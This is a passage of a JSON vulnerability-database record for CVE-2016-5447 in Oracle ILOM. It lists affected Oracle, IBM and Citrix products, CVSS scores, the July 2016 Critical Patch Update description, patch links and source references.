scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: 
"healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic 
infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: 
"application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", 
version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, { db: "NVD", id: "CVE-2016-5447", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003875", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, ], trust: 0.6, }, cve: "CVE-2016-5447", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 6.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 8, id: "CVE-2016-5447", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:L/Au:S/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 6.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 8, id: "VHN-94266", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:L/AU:S/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "LOW", baseScore: 7.6, baseSeverity: "HIGH", confidentialityImpact: "HIGH", exploitabilityScore: 2.8, id: "CVE-2016-5447", impactScore: 4.7, integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5447", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-5447", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-811", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-94266", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-5447", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: 
[ { db: "VULHUB", id: "VHN-94266", }, { db: "VULMON", id: "CVE-2016-5447", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, { db: "NVD", id: "CVE-2016-5447", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy 
Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. 
\nThe vulnerability can be exploited over the 'HTTP' protocol. The 'Backup-Restore' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation", sources: [ { db: "NVD", id: "CVE-2016-5447", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, { db: "VULHUB", id: "VHN-94266", }, { db: "VULMON", id: "CVE-2016-5447", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5447", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91982", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003875", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-811", trust: 0.7, }, { db: "VULHUB", id: "VHN-94266", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5447", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94266", }, { db: "VULMON", id: "CVE-2016-5447", }, { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, { db: "NVD", id: "CVE-2016-5447", }, ], }, id: "VAR-201607-0654", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94266", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:41:31.505000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical 
Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Component safety affirmative repair measures", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63171", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5447", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5447", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91982", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5447", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5447", }, { trust: 0.3, 
url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94266", }, { db: "VULMON", id: "CVE-2016-5447", }, { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, { db: "NVD", id: "CVE-2016-5447", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94266", }, { db: "VULMON", id: "CVE-2016-5447", }, { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, { db: "NVD", id: "CVE-2016-5447", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94266", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5447", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91982", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003875", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-811", }, { date: "2016-07-21T10:15:02.787000", db: "NVD", id: "CVE-2016-5447", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", 
id: "VHN-94266", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5447", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91982", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003875", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-811", }, { date: "2024-11-21T02:54:20.040000", db: "NVD", id: "CVE-2016-5447", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Backup-Restore Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003875", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, ], trust: 0.6, }, }
var-201604-0434
Vulnerability from variot
